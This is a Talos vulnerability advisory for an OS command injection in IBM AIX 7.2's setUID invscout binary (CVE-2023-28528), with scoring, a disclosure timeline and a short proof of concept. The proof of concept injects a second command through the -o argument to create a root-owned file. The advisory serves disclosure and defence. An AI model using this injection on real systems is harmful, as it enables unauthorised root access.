Talos Vulnerability Report

TALOS-2023-1691

IBM Corporation AIX invscout SetUID Binary OS Command Injection Vulnerability

April 24, 2023
CVE Number

CVE-2023-28528

SUMMARY

An OS command injection vulnerability exists in the invscout setUID binary functionality of IBM Corporation AIX 7.2. A specially-crafted command line argument can lead to execute privileged operation. An attacker can use arbitrary code execution to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

IBM Corporation AIX 7.2

PRODUCT URLS

AIX - http://us.ibm.com

CVSSv3 SCORE

5.5 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

DETAILS

AIX is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms.

The invscout setUID binary has an undocumented parameter that can be used to request the installation of an arbitrary RPM. Furthermore, the mechanism by which the RPM is installed requires the supplied value to be concatenated into a string that is then passed into system().

Exploit Proof of Concept

The most trivial method of exploitatation to gain command execution takes the following form:

$ invscout -RPM ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm -o "-i ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm; touch /etc/pwned; echo " package info-6.7-1.ppc is already installed /var/adm/invscout/microcode/../../../../..//home/tmb/info-6.7-1.aix5.1.ppc.rpm $ ls -la /etc/pwned -rw-rw-rw- 1 root staff 0 Dec 18 12:59 /etc/pwned

Note: The umask is set to 0 prior to exploitation commencing.

TIMELINE

2023-01-09 - Initial Vendor Contact
2023-01-16 - Vendor Disclosure
2023-04-12 - Vendor Patch Release
2023-04-24 - Public Release

Credit

Discovered by Tim Brown of Cisco Security Advisory EMEAR.